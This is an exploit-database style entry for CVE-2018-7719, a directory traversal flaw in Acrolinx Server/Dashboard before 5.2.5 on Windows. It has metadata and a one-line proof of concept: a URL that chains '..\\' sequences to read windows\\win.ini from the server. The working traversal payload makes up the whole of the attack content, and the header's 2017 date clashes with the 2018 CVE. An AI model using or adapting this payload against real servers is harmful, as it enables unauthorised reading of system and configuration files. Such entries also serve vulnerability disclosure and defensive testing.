Acrolinx Server < 5.2.5 - Directory Traversal

Author: Berk Dusunur
type: remote
platform: windows
port: 
date_added: 2018-03-26 
date_updated: 2018-03-26 
verified: 0 
codes: CVE-2018-7719 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Acrolinx Dashboard Directory Traversal
# CVE: CVE 2018-7719
# Date: 19.02.2017
# Exploit Author: Berk Dusunur
# Vendor Homepage: www.acrolinx.com
# Version:Before 5.2.5

PoC

Acrolinx dashboard windows works on the server.


http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html